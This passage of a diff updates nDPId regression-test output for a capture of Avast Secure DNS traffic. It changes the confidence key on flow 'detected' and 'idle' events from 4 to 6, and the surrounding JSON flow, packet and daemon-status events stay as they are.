-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321673727,"flow_last_seen":1625321673848,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321675283,"flow_last_seen":1625321675403,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321673727,"flow_last_seen":1625321673848,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321675283,"flow_last_seen":1625321675403,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":2150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":10,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1625401091063} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1625401091063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625401091063,"pkt":"eJS0JASgYDjgxTWgCABFAABDKc0AAH8RdWXAqAJktdYjlc0FAbsAL8xY+0MBAAABAAAAAAAAATIJc2VDdVJFZE5TBWF2YXNUA0NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1625401091190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625401091190,"pkt":"YDjgxTWgeJS0JASgCABFAADMtpAAADMRNBm11iOVwKgCZAG7zQUAuETH+0OBgAABAAEAAAAAATIJc2VDdVJFZE5TBWF2YXNUA0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1625401093323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625401093323,"pkt":"eJS0JASgYDjgxTWgCABFAABDKdEAAH8RdWHAqAJktdYjldaaAbsALxAyzbUBAAABAAAAAAAAATIJc2VjVVJlRE5zBWFWQVN0A2NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1625401093443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625401093443,"pkt":"YDjgxTWgeJS0JASgCABFAADMuwEAADIRMKi11iOVwKgCZAG71poAuIigzbWBgAABAAEAAAAAATIJc2VjVVJlRE5zBWFWQVN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217252,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217252,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":2580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":12,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":66,"global_ts_msec":1625413810414} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1625413810414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625413810414,"pkt":"eJS0JASgYDjgxTWgCABFAABDy3cAAH8R07rAqAJktdYjld4HAbsAL+Cz9gYBAAABAAAAAAAAATIJU0VDdXJlZE5TBUFWQXN0A0NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1625413810531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625413810531,"pkt":"YDjgxTWgeJS0JASgCABFAADMKHAAADERxDm11iOVwKgCZAG73gcAuFki9gaBgAABAAEAAAAAATIJU0VDdXJlZE5TBUFWQXN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401091063,"flow_last_seen":1625401091190,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401093323,"flow_last_seen":1625401093443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401091063,"flow_last_seen":1625401091190,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401093323,"flow_last_seen":1625401093443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":27,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":2795,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":13,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":73,"global_ts_msec":1625477697370} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1625477697370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477697370,"pkt":"eJS0JASgYDjgxTWgCABFAABDQqcAAH8RXIvAqAJktdYjleMrAbsAL7nVV2EBAAABAAAAAAAAATIJc0VjVVJFZE5zBWFWQVN0A0NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1625477697487,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477697487,"pkt":"YDjgxTWgeJS0JASgCABFAADMthcAADIRNZK11iOVwKgCZAG74ysAuDJEV2GBgAABAAEAAAAAATIJc0VjVVJFZE5zBWFWQVN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1625477700767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477700767,"pkt":"eJS0JASgYDjgxTWgCABFAABD4k8AAH8RvOLAqAJktdYjlfvnAbsAL7tgPVoBAAABAAAAAAAAATIJc0VjVXJFRE5zBUFWQXN0A0NPTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1625477700884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477700884,"pkt":"YDjgxTWgeJS0JASgCABFAADMuTUAADIRMnS11iOVwKgCZAG7++cAuDPPPVqBgAABAAEAAAAAATIJc0VjVXJFRE5zBUFWQXN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1625477702850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477702850,"pkt":"eJS0JASgYDjgxTWgCABFAABD4lMAAH8RvN7AqAJktdYjlcIoAbsAL9+b0x0BAAABAAAAAAAAATIJU0VDdXJFZG5TBUF2QXNUA2NvTQAAEAAB"} 
